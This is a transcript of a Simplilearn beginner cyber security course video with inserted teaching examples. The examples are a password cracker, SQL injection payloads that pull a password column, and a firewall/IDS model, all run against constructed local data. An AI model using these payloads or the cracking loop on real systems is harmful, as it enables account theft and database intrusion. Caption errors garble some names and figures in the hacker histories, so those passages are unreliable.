Cyber Security Full Course – Learn Cyber Security In 12 Hours | Cyber Security Training |Simplilearn



Hey everyone, welcome to this informative video on the cyber security full course. This full course will acquaint you with various cyber security concepts from scratch. If you are a beginner in this field, not to worry, you are at the right place. This cyber security tutorial for beginners will guide you through your cyber security journey. Cyber security is gaining popularity more than ever, given the current COVID-19 scenario and the entire world becoming virtual. According to a research study by Deep Instinct, ransomware increased by 435 percent in 2020 compared with 2019. These numbers show that this is likely to increase in 2021 and in the future. This shows how crucial it is to have cyber security to put an end to such cyber attacks. Now let's go ahead and get started with our learning journey. Here we will understand cyber security, cyber attacks, cryptography and also look into ethical hacking.

We'll begin the cyber security tutorial for beginners course with an interesting introduction to cyber security, following which we will have a look at the top five skills that are required for your cyber security career. Next we will look at the different types of cyber attacks and then understand the importance of cyber security and what cyber security is all about. Moving forward, we will look into the concept of ethical hacking along with a hands-on demo for each type of cyber attack. Next we will acquaint you with the concept of cryptography. Following this, we'll briefly introduce you to the various cyber security certifications available today, along with cyber security career prospects. The certifications we will be talking about are the CompTIA Security+ certification, the CEH certification along with the roles and responsibilities of a certified ethical hacker, and the world-renowned CISSP certification. We will then conclude this cyber security full course with a set of the top 50 cyber security interview questions and answers that can help you crack your cyber security interview. For this training, with me I have the experienced cyber security specialists Bipin and Beverb, and together we will take you through the various topics in cyber security, cryptography and ethical hacking, all of this in under 12 hours. So let's start off with an interesting short video on cyber security. But before we begin, make sure to subscribe to our YouTube channel and hit the bell icon to never miss an update from Simplilearn.

With just one click you can shop online, make online bank transfers, like a post on Instagram and much more. As convenient and exciting as it sounds, have you ever wondered how unsafe it could be to live in this digital era? Is our data well protected? Well, no. To help us tackle this issue, we have cyber security to our rescue.

Cyber security is the art of protecting our networks and devices from unauthorized access. When I say unauthorized access here, it would refer to a small or big cyber attack or a cyber threat. There are various types of cyber attacks that you can fall prey to: phishing, malware attacks, DDoS attacks, password attacks and many more. A few ways to implement cyber security are defining clear boundaries, using network security control devices like firewalls and IDS, and carrying out security testing. At any point in time, the CIA, that is confidentiality, integrity and availability, is being implemented in an organization to ensure that our information is secure. There is a great demand for professionals like ethical hackers, CISOs and many more cyber security experts who can implement cyber security and safeguard an organization's data. So what are you waiting for? Get certified with Simplilearn and begin your lucrative cyber security career. This was cyber security in short.

Meet Anne. She often shops from www.shoppingcart.com. She has her information like email ID, address and credit card details saved on the website to enable a faster and hassle-free shopping experience. The required information is stored in a server. One day Anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com. In order to receive the coupon code, she was asked to fill in her shoppingcart.com account credentials. This didn't seem fishy to her at the time, as she thought it was just an account verification step. Little did she realize the danger she would be facing. She was knocked off her feet when a substantial amount of money was wiped off her account. How do you think this happened? Well, yes, the email she received was fake. Anne's shoppingcart.com account witnessed unauthorized access from a third party. This type of attack is known as a cyber attack, and the person who carries it out is called a hacker.

Could Anne have prevented this attack? Indeed she could have, with the help of cyber security. Cyber security involves techniques that help in securing various digital components, networks, data and computer systems from unauthorized digital access. There are multiple ways to implement cyber security, depending on the kind of network you are connected to and the type of cyber attacks you are prone to. So let's take a look at the various cyber attacks that Anne could have been exposed to. One of the most common types of cyber attacks is a malware attack, like trojans, adware and spyware, to name a few. Had Anne downloaded any suspicious attachments online, her system could have gotten corrupted by certain malicious viruses embedded within the attachments. Next is a phishing attack, the type of cyber attack which Anne experienced. Here the hacker usually sends fraudulent emails which appear to be coming from a legitimate source. This is done to install malware or to steal sensitive data like credit card information and login credentials. Another type of attack is the man-in-the-middle attack. Here the hacker gains access to the information path between Anne's device and the website's server. The hacker's computer takes over Anne's IP address; by doing so, the communication line between Anne and the website is secretly intercepted. This commonly happens with unsecured Wi-Fi networks and also through malware. A password attack is one of the easiest ways to hack a system. Here Anne's password could have been cracked by using either common passwords or trying all possible alphabetical combinations.
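The two password attacks just described, as an added example that is not part of the original video: a dictionary pass over common passwords, then an exhaustive search of every lowercase alphabetic string up to four characters. It assumes the site stored Anne's password as an unsalted SHA-256 hash, a constructed weak scenario chosen only so the attack can run offline against a known hash; the wordlist and the target passwords are constructed too. The `keyspace` helper goes slightly beyond the narration by showing why a unique alphanumeric password (the defence Anne adopts later in the story) escapes this search: four characters over 62 symbols is more than 30 times as many candidates as over 26 letters, and the alphabetic search gives up on `Abc1` entirely because it never tries digits or capitals.

```python
import hashlib
import itertools
import string


def sha256_hex(password: str) -> str:
    """Unsalted SHA-256 of the password: an assumed weak storage scheme,
    used here only so the attack can run offline against a known hash."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Constructed stand-in for a leaked list of common passwords.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "iloveyou", "admin"]


def dictionary_attack(target_hash: str, wordlist=COMMON_PASSWORDS):
    """Hash each common password and compare; returns the match or None."""
    for candidate in wordlist:
        if sha256_hex(candidate) == target_hash:
            return candidate
    return None


def brute_force_alpha(target_hash: str, max_len: int = 4,
                      alphabet: str = string.ascii_lowercase):
    """Try every purely alphabetic string of 1..max_len characters, in
    lexicographic order. Returns (password or None, number of guesses)."""
    tried = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            tried += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate, tried
    return None, tried


def keyspace(alphabet_size: int, max_len: int) -> int:
    """Number of candidates an exhaustive search of 1..max_len must cover."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    # Constructed targets: "letmein" falls to the dictionary, "abc" to the
    # alphabetic search, and the alphanumeric "Abc1" survives both.
    print(dictionary_attack(sha256_hex("letmein")))   # letmein
    print(brute_force_alpha(sha256_hex("abc")))       # ('abc', 731)
    print(brute_force_alpha(sha256_hex("Abc1")))      # (None, 475254)
    print(keyspace(26, 4), keyspace(62, 4))           # 475254 15018570
```

The guess counter is the point of the exercise: the whole lowercase four-character space is under half a million hashes, which a laptop finishes in well under a second, so the defence is not a longer alphabetic password but a wider alphabet and, on the server side, salted slow hashing rather than the plain SHA-256 assumed here.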

To prevent future cyber attacks, Anne sought to implement a few cyber security practices. First, she installed a firewall. As the name suggests, it is a virtual wall between Anne's computer and the internet. Firewalls filter the incoming and outgoing traffic from your device to safeguard your network, and they can either be software applications or hardware reinforcements. Secondly, Anne implemented honeypots. Just like how flowers attract bees, dummy computer systems called honeypots are used to attract attackers. These systems are made to look vulnerable in order to deceive attackers, and this in turn defends the real system. In addition to these, she also decided to use unique alphanumeric passwords and antivirus software, and started avoiding mails from unknown senders. That was Anne's story.

Cyber attacks are not just confined to individuals but also to public and private organizations. The cyber attacks carried out in such places are more deadly, and they result in colossal losses. Motives of such attacks are many, starting from tampering with crucial data to monetary gains. Let's have a look at a few of the cyber attacks that companies are subjected to. Various public sector organizations and large corporations face the advanced persistent threat (APT). In this form of attack, hackers gain access to networks for a prolonged period in order to continuously gain confidential information. Companies also witness the denial of service attack, where networks are flooded with traffic, which in turn leaves legitimate service requests unattended. A variant of this is the distributed denial of service (DDoS) attack, when multiple systems are used to launch the attack. When a hacker manipulates a standard SQL query in a database-driven website, it is known as a SQL injection attack. By doing so, hackers can view, edit and delete tables from databases. Amidst a plethora of cyber attacks, it is indeed a challenge for organizations with several networks and servers to ensure complete security.
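What "manipulating a standard SQL query" looks like in practice, as an added example that is not part of the original video. It builds an in-memory SQLite database with constructed `users` and `orders` tables (the table names, rows and the order-lookup function are assumptions, not anything from the page), then runs the same lookup two ways: the vulnerable version pastes the username into the SQL text, so a crafted username either widens the WHERE clause to read every customer's orders or UNIONs in the password column to view a table the query was never meant to touch; the hardened version binds the username as a parameter, so the same input is just a string that matches no customer.

```python
import sqlite3

# Two constructed attacker inputs for the "username" field.
PAYLOAD_BYPASS = "' OR '1'='1"                                            # every row
PAYLOAD_UNION = "' UNION SELECT username || ':' || password FROM users --"  # other table


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows standing in for a shop's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users  (username TEXT, password TEXT);
        CREATE TABLE orders (username TEXT, item TEXT);
        INSERT INTO users  VALUES ('anne', 's3cret'), ('bob', 'hunter2');
        INSERT INTO orders VALUES ('anne', 'book'),   ('bob', 'lamp');
    """)
    return conn


def orders_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the username becomes part of the SQL text itself, so
    quotes, OR and UNION in the input are parsed as SQL."""
    query = f"SELECT item FROM orders WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def orders_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the username is bound as a parameter and never parsed as SQL."""
    query = "SELECT item FROM orders WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


if __name__ == "__main__":
    db = make_db()
    print(orders_vulnerable(db, "anne"))                  # ['book']
    print(orders_vulnerable(db, PAYLOAD_BYPASS))          # ['book', 'lamp']
    print(sorted(orders_vulnerable(db, PAYLOAD_UNION)))   # ['anne:s3cret', 'bob:hunter2']
    print(orders_safe(db, PAYLOAD_UNION))                 # []
```

The trailing `--` in the UNION payload comments out the closing quote the application appends, which is why the injected statement still parses. Bound parameters are the fix, not quote escaping: the driver sends the value separately from the statement text, so there is no string for the attacker to break out of.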

This is not an easy task, and to help with this, cyber security professionals are hired to work on identifying cyber threats and securing a company's network. There are multiple job roles in the field of cyber security. If hacking fascinates you, then the role of an ethical hacker is something to be explored. Such professionals try to find a network's vulnerabilities just like how a hacker would do, but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack. But if you are looking to design robust security structures, then the role of a security architect is more apt. A chief information security officer (CISO) plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization. With the increase in the production of global digital data, it is anticipated that cyber attacks will quadruple in the near future. Organizations are going to need cyber security professionals who can prevent these attacks. A career in the field of cyber security is lucrative and a very smart decision for professionals now. So what are you waiting for? Get certified with Simplilearn and become a cyber security expert.

With businesses moving online and shifting to cloud storage, currently the demand for cyber security is at its peak. With that comes a high demand for cyber security experts who can safeguard digital data. According to Cybercrime Magazine by Cybersecurity Ventures, globally there would be nearly 3.5 million unfilled cyber security jobs by 2021, and the number of internet users will hit a whopping 6 billion by 2022. These numbers speak volumes, and this shows the growing demand for cyber security professionals across the globe. Now that you know the high demand for cyber security professionals, let us help you start your cyber security career by bagging the right skill set.

Many of you out there might be waiting to become a cyber security professional but are unsure of how to go about it and what skills you would need to get a cyber security job. Not to worry, we are here to help you with that. After extensive research, we have come up with the top five skills that will help you get into the field of cyber security. Let's have a look at these skills individually.

First we have networking and system administration. The number one skill you need to have to enter the field of cyber security is computer networking. Networking is the backbone of the internet. It is imperative that you have an in-depth understanding of networking to start a career in cyber security. A network is a group of interconnected devices, and networking is the art of understanding how data is sent, transmitted and received amongst these devices. You need to know various routing protocols. The TCP and OSI models govern networking; the OSI model is comparatively newer. Basically, in these models all the protocols are grouped into layers and work together to help you receive data on your device sent from a server. Learning networking will help you understand the technical aspects of data transmission, which will help you secure your data. You can take up networking certifications like Security+ and Cisco CCNA to gain a strong networking foundation. Another skill that will be beneficial for you is to master system administration. If you think about it, all of us are sysadmins at some level. System administration is all about configuring and maintaining computers. You must be curious to know every aspect of your computer's features and settings, and play around a bit. Carry out a trial and error method and give yourself small tasks like recovering deleted files or monitoring old viruses on a VM. Explore new techniques, put them into use and expand your knowledge.

Let us now move on to our second skill: knowledge of operating systems and virtual machines. To become a cyber security professional, you need to have a strong knowledge of operating environments such as Windows, Linux and macOS. Cyber security professionals largely use Linux, and it comes with several tools. To learn operating systems, go ahead and set up and use virtual machines, that is VMs, and play around with them. This will help you gain hands-on experience. As a cyber security expert, you should be comfortable working on any OS. VMs allow you to train and research in an isolated environment and help you maximize your skills. The next point to remember is to know Kali Linux. It is the most widely known Linux distribution for ethical hacking and penetration testing. It comes with several hundred tools related to penetration testing, malware analysis, security research, computer forensics and so on. Kali contains several projects, and you can learn a lot. Another good thing about Kali is that it is free to use. So what are you waiting for? Download and start right away. Remember that Linux is the backbone of cyber security and a commonly asked topic for cyber security interviews, especially for pen testing roles.

Moving on to our third skill. Our third skill is network security control. It is another basic skill that every cyber security professional should have. Network security control refers to the different measures which are employed to enhance the security of a network. It is simple: you can only safeguard your network if you know how it works, how routers, firewalls and other devices work. A firewall is hardware or software that blocks incoming or outgoing traffic from the internet to your computer. Firewalls are required to secure a network. As a cyber security expert, you must be able to leverage a firewall to filter and prevent unauthorized traffic onto the network. In addition to that, as a cyber security expert you must know about intrusion detection systems, intrusion prevention systems, virtual private networks and remote access. An intrusion detection system (IDS) is designed to detect unauthorized access to a system.
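A compact model of the two controls just described, firewall filtering and IDS detection, as an added example that is not part of the original video and not the configuration syntax of any real product. It assumes a constructed rule table evaluated first-match-wins with an implicit deny, and a constructed connection log in the shape `<time> <src> <dst> <dport> <proto>` using documentation address ranges. `firewall_decision` is the filtering step; `detect_port_scans` is a minimal IDS rule that flags a source touching ten or more distinct ports, the kind of policy violation the narration says an analyst should recognize; `audit_log` replays the same log through the firewall to show how the two controls line up on the same traffic.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    proto: str


# Constructed rule table (assumption: first matching rule wins, then implicit deny).
# Fields: action, source network, destination network, destination port, protocol.
RULES = [
    ("allow", "any",         "10.0.0.0/24", 443,  "tcp"),  # HTTPS in to the LAN
    ("allow", "any",         "10.0.0.0/24", 80,   "tcp"),  # HTTP in to the LAN
    ("deny",  "any",         "10.0.0.0/24", 22,   "tcp"),  # no SSH from outside
    ("allow", "10.0.0.0/24", "any",         None, "any"),  # anything outbound from the LAN
]


def _matches(value, pattern, is_network=False):
    """'any' or None matches everything; networks use CIDR containment."""
    if pattern in (None, "any"):
        return True
    if is_network:
        return ipaddress.ip_address(value) in ipaddress.ip_network(pattern)
    return value == pattern


def firewall_decision(pkt: Packet, rules=RULES) -> str:
    """Filtering step: return 'allow' or 'deny' for one connection attempt."""
    for action, src, dst, dport, proto in rules:
        if (_matches(pkt.src, src, True) and _matches(pkt.dst, dst, True)
                and _matches(pkt.dport, dport) and _matches(pkt.proto, proto)):
            return action
    return "deny"  # nothing matched: implicit default deny


# Constructed connection log: "<time> <src> <dst> <dport> <proto>".
# 198.51.100.7 is an ordinary HTTPS client; 203.0.113.5 sweeps eleven ports.
SAMPLE_LOG = [
    "10:00:01 198.51.100.7 10.0.0.10 443 tcp",
    "10:00:02 198.51.100.7 10.0.0.10 443 tcp",
] + [f"10:01:{i:02d} 203.0.113.5 10.0.0.10 {port} tcp"
     for i, port in enumerate([21, 22, 23, 25, 80, 110, 143, 443, 445, 3389, 8080])]


def parse_line(line: str) -> Packet:
    _, src, dst, dport, proto = line.split()
    return Packet(src, dst, int(dport), proto)


def detect_port_scans(log_lines, threshold: int = 10) -> set:
    """Minimal IDS rule: a source that touches >= threshold distinct
    (destination, port) pairs is reported as a port scanner."""
    touched = defaultdict(set)
    for line in log_lines:
        pkt = parse_line(line)
        touched[pkt.src].add((pkt.dst, pkt.dport))
    return {src for src, seen in touched.items() if len(seen) >= threshold}


def audit_log(log_lines, rules=RULES) -> dict:
    """Replay the log through the firewall; per-source count of denied attempts."""
    denied = defaultdict(int)
    for line in log_lines:
        pkt = parse_line(line)
        if firewall_decision(pkt, rules) == "deny":
            denied[pkt.src] += 1
    return dict(denied)


if __name__ == "__main__":
    print(firewall_decision(Packet("203.0.113.5", "10.0.0.10", 22, "tcp")))  # deny
    print(detect_port_scans(SAMPLE_LOG))   # {'203.0.113.5'}
    print(audit_log(SAMPLE_LOG))           # {'203.0.113.5': 9}
```

Note what each control sees: the firewall lets the scanner's probes to 80 and 443 through because they match legitimate rules, and only the IDS, looking at the pattern across all eleven probes, names the source as hostile. That is why the narration pairs the two rather than relying on the firewall alone.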

An IDS is used together with a firewall and a router. You should be able to operate the IDS and recognize any security policy violations and malicious traffic on the network. As many of you may have used one, a VPN is a connection between a VPN server and a VPN client. It is a secure tunnel across the internet. Moving on, next up we have an interesting skill. Any idea what that is? If yes, pause and leave a comment as to what you think the next skill will be. If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn; click on the link in the description to know more. And before we jump into this skill, if you find this video interesting, make sure to give it a thumbs up.

The fourth skill on our list is coding. So you might be wondering if coding is really required to become a cyber security professional. Well, it is true that not all cyber security professionals have or need coding skills. However, having zero coding knowledge may limit your opportunities in the future. Knowing a couple of programming languages will help you identify the plan behind an attack and defend against deadly hacking techniques. So, as seen on your screens, these are the best programming languages to learn to make your cyber security career worthwhile. We have C and C++. The C programming language is the backbone of most operating systems. C and C++ are low-level programming languages that you need to know as a cyber security professional. On the other hand, Python is a high-level programming language that is becoming popular among cyber security experts today. Knowing Python will give you an upper hand in your career; it will help you identify and fix vulnerabilities. JavaScript is another high-level programming language that adds interactivity to web pages. A good advantage of knowing JavaScript is that you can prevent cross-site scripting attacks from occurring, as in these attacks the attacker implants malicious code in a web application. Speaking of PHP, because most of the websites are created using PHP, learning it will help you defend against intruders. Similarly, HTML is another language cyber security professionals should understand, as most websites use it and it is one of the easiest languages to learn. Another programming language that you can use is Golang. It is great for cryptography; you can solve various cyber security problems with it. Then we have SQL, that is Structured Query Language. Attackers use this language to damage the stored data; one such example is the SQL injection attack. Hence, having a good understanding of SQL will be highly beneficial. Another point we'd like to highlight is to have knowledge of assembly language. This will help you become a cyber security engineer. Assembly will help you understand how malware functions and thereby help you defend against it. In the cyber security domain you can't just lock into a single language, and hence it is advised that you're acquainted with a couple of them. You can also do a crash course for these languages and learn them. Hence, determine the best programming language for your cyber security role and get familiar with the basics.

Moving on, our fifth skill on the list is cloud security. There is a growing demand for cyber security professionals with cloud security skills in the coming years. Companies are on the lookout for professionals with security skills applicable to public and hybrid cloud platforms such as Amazon Web Services and Azure. More organizations look to cloud infrastructure to store data and run applications. This includes the implementation of policies and technologies that protect cloud-based systems and devices. Just like application development security, cloud security also involves building secure systems from the start. Companies want professionals who can manage the cloud security tools to identify and prevent any cloud breaches. People with experience and knowledge in managing big platforms such as Microsoft Azure, AWS and GCP are in high demand.

Now that we have seen the top five cyber security skills, let us go through a set of additional skills that can help you get into the cyber security field. Remember that to become a successful cyber security expert you must possess a rich and diverse skill set. So, in the list of additional skills, first we have risk analysis. Identifying risks even before their arrival is a great skill. Cyber security professionals are required to identify, manage and mitigate risks. Risk management and mitigation is a skill set that is going to be highly in demand in the coming years. Next we have information security. Companies require skilled professionals who can protect their electronic data from unauthorized access. Here, in-demand skills are authentication, authorization, malware analysis and data recovery. Next on our list is security incident handling and response. As a cyber security expert, you must be prepared to handle any forthcoming threat of violating an organization's security policy. By following an updated incident response plan, your team can proactively protect your data and minimize the damages. In security incident management, you are required to identify, manage, record and analyze security threats in real time. A security incident can be an active threat, a successful compromise of data or an attempted intrusion. It can also be incidents like DDoS attacks, phishing, APTs, ransomware and many more. Another important pointer is that as a security practitioner you must also manage and analyze the security information and event management (SIEM) tools and services.

Moving on, we have security audit. Security auditing is an internal check that is carried out to find flaws in the organization's information system. You must be able to conduct a review of the organization's adherence to regulatory guidelines. Security audit and compliance knowledge are very crucial, as any mistake of regulatory compliance could lead to hefty penalties. Soon, organizations will need people who are more familiar with the various data privacy regulations. If you are good at paperwork, you can capitalize on this skill. Companies will need people who can understand what paperwork to file and which security protocols to use to comply with the regulations. Finally we have laws and regulations, an often overlooked cyber security aspect. There are several cyber security laws and regulations, and if you break these laws, intentionally or not, it doesn't matter, as you will still be charged. These laws define how you can use the internet, and they also define how people can be protected from becoming the victims of cyber crimes. Knowing these laws and regulations and following the best practices will make you ethical at your job, and this will in turn be good for your organization. So those were our list of additional skills. Apart from these, make sure you stay updated with new hacks and learn new tools, as cyber security is ever evolving. Another important skill apart from these technical skills is your soft skills. Having a set of good soft skills will help you bag your dream job. We have a video on the top five soft skills that will help you grow in your career. Do watch that and incorporate those skills as well.

We bring you the top 10 computer hacks of all time. Let's see what we have at number 10. From April 27, 2007, Estonia, the European

Country faced a series of cyber attacks that lasted for weeks this happened when the estonian government decided to move the bronze soldier from thailand center to a less prominent military cemetery located on the city’s outskirts unprecedented levels of internet traffic took down estonian banks online services media outlets broadcasters and government bodies

Botnets sent massive waves of spam and vast amounts of automated online requests according to researchers the public faced ddos attacks there were conflicts to edit the english language version of the bronze soldier’s wikipedia page as well although there is no confirmation russia is believed to be behind these cyber

Attacks that largely crippled the estonian society let’s now move on to the next attack on december 23 2015 several parts of ukraine witnessed a power outage and this was not a typical blackout it was indeed the result of a cyber attack information systems of three energy distribution companies in ukraine were

Compromised it is the first known victorious cyber attack on a power grid it is said that here hackers sent out phishing emails to the power companies 30 substations were switched off and about 230 000 people were left in the dark for about one to six hours u.s investigators believed that russia-based

Hackers were responsible for this experts have warned that other countries could also be vulnerable to such attacks let’s see what we have at number eight in the year 1999 a cyber attack caused a 21 day shutdown of nasa computers unbelievable isn’t it the hacker was none other than the then 15 year old

Jonathan james he first penetrated u.s department of defense divisions computers and installed a back door on its servers this allowed him to intercept more than a thousand government emails including the ones containing usernames and passwords this helped james steal a piece of nasa software and cracked the nasa computers

That support the international space station which cost the space exploration agencies forty one thousand dollars as systems were shut down for three weeks he was the first person to carry out a computer hack against the american space agency let’s now move on to the next attack

In late november 2014 there was a leak of confidential data from the film studio of sony pictures information about sony pictures employees their emails copies of the then unreleased sony films future propositions and other crucial data were leaked this cyber attack was carried out by a hacker group named guardians of peace so

What did the hackers want well they demanded that sony withdraw its then upcoming movie the interview this movie was a comedy story line to assassinate the north korean leader kim jong-un sony then decided to cancel the film’s theatrical release due to the threats at cinema screening the movie

It is indeed hard to trace the roots of a cyber attack in this case after evaluation the u.s intelligence officials arrived at the theory that the attack was in a way related to the government of north korea however north korea had denied the same moving on to our number six

In december 2006 tjx the u.s retailer company identified that 45.6 million debit and credit card details were stolen this happened from one of its systems over 18 months by an unknown number of intruders it was one of the first largest ever cyber attacks involving the loss of personal data

As a result banks in the affected regions had to reissue and block thousands of payment cards a group of hackers did this albert gonzalez being the mastermind the group was from miami the place where the tjx heist was believed to have originated reports said that the tjx data breach

Occurred because of weak web encryption at two of its marshall stores in miami next moving on to our top five let us see what we have at number five the year 2010 witnessed the discovery of the deadly computer worm stuxnet this malware’s motive was unlike any other usual cyber attacks it aimed at

Destructing the equipment the computers controlled stuxnet came with the deadly purpose of damaging iran’s nuclear infrastructure it infected more than 200 000 computers including 14 industrial sites and a uranium enrichment plant in iran stuxnet initially spread via microsoft windows and targeted siemens industrial control systems although it was discovered only in 2010

It is believed to have been silently sabotaging iran’s nuclear facilities it was one of the first discovered malware that was capable of hampering hardware systems it largely damaged the centrifuge of the iranian reactors this was believed to be a cyber weapon created by the us and the israeli intelligence although there is no

Documented evidence or acceptance by either of the countries for the same moving on to number four in the year 2014 home depot was the victim of one of the deadliest cyber attacks 56 million payment cards were compromised along with 53 million customer email addresses stolen this security breach happened from april

To september 2014. criminals were believed to have used a third-party vendor’s username and password to enter the perimeter of home depos network the attackers were then able to deploy custom built malware on its self-checkout systems in the us and canada moving on to our top three as you might

Be aware the playstation gaming system is one of sony’s most popular products unfortunately in april 2011 sony executives witnessed abnormal activity on the playstation network this resulted in the compromise of approximately 77 million playstation users accounts and prevented users of playstation 3 and playstation portable consoles from accessing this service

This forced sony to turn off the playstation network on april 20th on may 4th sony confirmed that personally identifiable information from each of the 77 million accounts had been exposed the outage lasted for 23 days sony released almost daily announcements concerning the system outage in the end sony is believed to have invested

Approximately 170 million dollars to improve the network security to investigate the attack and to cover the expenses of caring for the consumers that had been affected let’s now move on to the next attack at number two in may 2017 one of the most dangerous cyber attacks took place

It was known as the wannacry ransomware attack caused by the wannacry crypto worm the victims were the users that used the unsupported version of microsoft windows and those who hadn’t installed the new security update this did not take place through phishing like other attacks but through an exposed vulnerable smb port the attack

Originated in asia and then eventually spread across the globe in a day more than 200 000 computers were infected across 150 countries the wannacry crypto worm locked the users out of the targeted systems and encrypted their data the users were asked for a ransom of 300 to 600 which

Had to be paid via bitcoin in exchange for their data this attack took a toll on both private and government organizations it resulted in damages from hundreds of millions to billions of dollars in a matter of few days the emergency patches released by microsoft halted the attack also the discovery of a kill

Switch prevented the infected computers from spreading the crypto worm security experts in a few countries believed that north korea was behind this attack and finally let’s see what we have at number one more than two decades ago in march 1999 the melissa virus a mass mailing macro virus was released

It targeted microsoft word and outlook based systems and created considerable network traffic melissa virus infected computers via emails the email would look like an important message well yes it was fake if the recipient opens the attachments in the mail and downloads the document and then opens it with microsoft word a

Virus was released on their computers this would then mass mail itself to the first 50 people in the victims contact list and then disable multiple safeguard features on microsoft word and microsoft outlook this began spreading like a wildfire across the internet david l smith released the virus the virus

Caused nearly 80 million worth of damages it did not steal data or money however it caused a havoc almost 1 million email accounts were disrupted worldwide agencies were overloaded and some had to be shut down entirely and internet traffic in some locations were slowed down do you agree with our list

If you’re aware of any other great interesting computer hacks in history do let us know in the comment section below according to cyber security ventures the global cyber crime cost is expected to grow and reach 10.5 trillion us dollars by 2025. that’s the cost we have to pay for cybercrimes

At number 10 we have johnson james and cheddar in the year 2006 charleston james anchetta of towney california was charged for controlling huge number of botnets in other words hijacked computers this was the first time that a hacker who was sent to prison for the use of botnet technology antshudai used botnets

To compromise more than 400 000 computers advertising companies paid him to install adware or bots on specified systems it is also noted that ancieta advertised the sale of his spotnets to those interested in sending spam or launching ddos attacks without being identified he was also pleaded guilty for infecting

Machines at two u.s military sites which earned him more than sixty one thousand dollars johnson james angela was captured in a well-planned and elaborate sting operation when fbi agents coaxed him in their office on the pretext of collecting computer equipment he was sentenced to nearly 60 months of

Imprisonment and was ordered to pay 15 000 us dollars to the u.s federal government for hacking their military computers at number nine we have andren lammer lamo began his hacking journey by hacking games he was more likely a grey hat hacker who wanted people to understand the importance of internet security

However, it went far beyond that when he hacked into the New York Times intranet in 2002. He was called the homeless hacker for his transient lifestyle, and he often had no fixed address; he used to hack top-notch accounts sitting in cafeterias, libraries and so on. He was convicted for compromising security at the New York Times, Microsoft and Yahoo, to name a few. He later earned the label of an American threat analyst and appeared on Good Morning America, Fox News, Democracy Now and so on as an expert on net-centric crime and incidents. Lamo died in the year 2018 at the age of 37.

At number eight we have Kevin Poulsen, a former American black hat hacker. In the hacker community he is better known as Dark Dante. At the age of 17 he hacked the US Department of Defense, but he was let off with a warning as he was a minor. Later, in 1990, he propelled to stardom for infiltrating a radio show calling contest and guaranteeing that he would be the 102nd caller to win a brand new Porsche 944 S2. The FBI started pursuing Poulsen and he was soon arrested and sentenced to five years of imprisonment. He was also barred from using a computer or the internet for three years post his release. Later he took to white hat hacking and journalism, and in the year 2005 he became a senior editor of Wired News.

At number 7 we have the famous American hacker Jonathan James, better known as comrade.

He was the first juvenile in the United States to be sent to prison for hacking. His famous hack was his intrusion into the Defense Threat Reduction Agency, or DTRA, computers, a division of the United States Department of Defense. He installed a back door on its servers, which enabled him to access over 3,000 messages from government employees, various usernames, passwords and other confidential data. This helped James steal a piece of NASA software and forced NASA to shut down computers for three weeks to fix the issue, at an estimated cost of 41,000 American dollars. He was sentenced to six months' arrest. He carried out his hacking using the alias comrade and specialized in hacking high-profile government systems. However, he had a bitter ending in 2008.

Moving on to the hacker at number six. At number six we have Anonymous. The Anonymous group is an international, decentralized hacktivist movement that is widely known for its cyber attacks against several governments, their agencies and the Church of Scientology. This group is focused on the concept of social justice. The members of this group, known as anons, are recognized in public by wearing Guy Fawkes masks; however, some members cover their faces without using the well-known masks as well. They are known as the digital Robin Hood amongst their supporters. One of the noted incidents was in the year 2008, when the group took issue with the Church of Scientology and began to disable their websites. They are also known for hacking the Vatican, the FBI, PayPal, Sony, the CIA, Mastercard, Visa, and the Israeli, Chinese, Tunisian and Ugandan governments. While law enforcement agencies and the FBI have tracked down a few of the group's members, the lack of any proper hierarchy makes it almost impossible to identify or eliminate Anonymous as a whole.

At number five we have the British duo Mathew Bevan and Richard Pryce. In 1994 the duo hacked into multiple US military systems, including the Defense Information Systems Agency, Griffiss Air Force Base and the Korean Atomic Research Institute. They infiltrated foreign systems and transferred critical data of the Korean Atomic Research Institute into the United States Air Force system. In 1996 Bevan was arrested for hacking incidents related to the US Air Force, defense manufacturer Lockheed, NASA and NATO. The Pentagon described Bevan as the number one threat to US security and possibly the single biggest threat to world peace since Adolf Hitler; however, Bevan claims he was looking to prove a UFO conspiracy theory. In 1997 Pryce was fined 1,200 pounds after pleading guilty to 12 offences of gaining unauthorized access to computer systems in March and April 1994. Having malicious purposes or not, Bevan and Pryce displayed that even military networks are vulnerable.

Now moving on to our hacker at number 4. At number 4 we have Astra. This hacker is a tad bit different from the others on this list as he has never been publicly identified. The pen name of this hacker, Astra, is a Sanskrit word for a weapon. In 2008 it was reported that the authorities apprehended him; at that time he was described as a 58-year-old Greek mathematician. He hacked into France's Dassault Group systems, got his hands on vulnerable weapons technology data and then sold it to different countries. For a long period Astra was reported to have sold the data to nearly 250 people from across the world; this in turn caused Dassault 360 million US dollars of damage. While Astra's real identity was never disclosed, officials have said that he had been wanted since the year 2002.

At number three we have the famous American computer hacker Albert Gonzalez. He was responsible for carrying out multiple hacks, and he is accused of masterminding the biggest fraud in history, that is the combined credit card theft and reselling of nearly 170 million card and ATM numbers from the year 2005 to 2007. This shows how unsafe internet banking can be at times. This was recorded to be one of the biggest credit card thefts in history, and he carried it out by installing a sniffer. Albert Gonzalez is also said to have been the mastermind of the TJX Companies hack, wherein 45.6 million debit and credit card numbers were stolen. Later, in 2010, he was sentenced to 20 years in federal prison.

